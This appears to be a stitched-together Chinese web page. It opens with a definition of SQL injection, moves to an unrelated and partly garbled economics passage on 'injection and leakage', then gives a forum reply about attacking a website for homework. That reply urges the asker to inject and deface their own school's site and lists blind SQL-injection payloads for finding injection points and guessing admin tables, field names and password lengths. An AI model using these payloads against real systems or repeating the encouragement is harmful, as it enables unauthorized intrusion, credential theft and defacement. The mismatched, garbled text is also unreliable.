×

sql注入 注入

什么是SQL注入?怎么解释注入与漏出

admin admin 发表于2022-05-17 18:01:30 浏览128 评论0

抢沙发发表评论

什么是SQL注入


SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。


怎么解释注入与漏出


漏出:指脱离经济循环的收入流量。与之相对应的是注入,指新加入经济体的收入流量。譬如,个人或在开户银行增加储蓄存款,对于宏观经济来说是漏出;而银行将这些存款放贷出去,借款者又将其用于实业,这就是注入。   如注入大于漏出,则经济活动规模会扩张;   如注入小于漏出,则经济活动规模会收缩。   家庭的全部收入在两部门模型中分为消费和储蓄两部分,这样,家庭的消费支出小于其收入,即c《y,因此,消费支出相对于国民产出而言会相对不足,的存货势必增加,这样储蓄使国民收入不能全部流入最终产品市场,因此,储蓄是国民收入的漏出量。 生产再进行的条件之一就是。指实际资本存量的增加。是固定资本和存货的总和。会使因储蓄而漏出的那部分国民收入又回到最终产品市场上,因此,是国民收入的注入量。

网站注入,由于学校的作业要求用SQL注入网站,使用inurl:id=,但是我到现在还找不到,麻烦帮帮忙


楼主可以去注入你们学校的网站并挂黑页
常用注入语句

1.判断有无注入点
’ ; and 1=1 and 1=2

2.猜表: 常见的表:admin adminuser user pass password 等..
and 0《》(select count(*) from *)
and 0《》(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0《 返回正确页面 1《返回错误页面说明帐号数目就是1个
and 0《(select count(*) from admin)
and 1《(select count(*) from admin)

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*) 》0)--
and 1=(select count(*) from admin where len(用户字段名称name)》0)
and 1=(select count(*) from admin where len(_blank》密码字段名称password)》0)

5.猜解各个字段的长度 猜解长度就是把》0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)》0)
and 1=(select count(*) from admin where len(name)》6) 错误
and 1=(select count(*) from admin where len(name)》5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)》11) 正确
and 1=(select count(*) from admin where len(password)》12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
-sql注入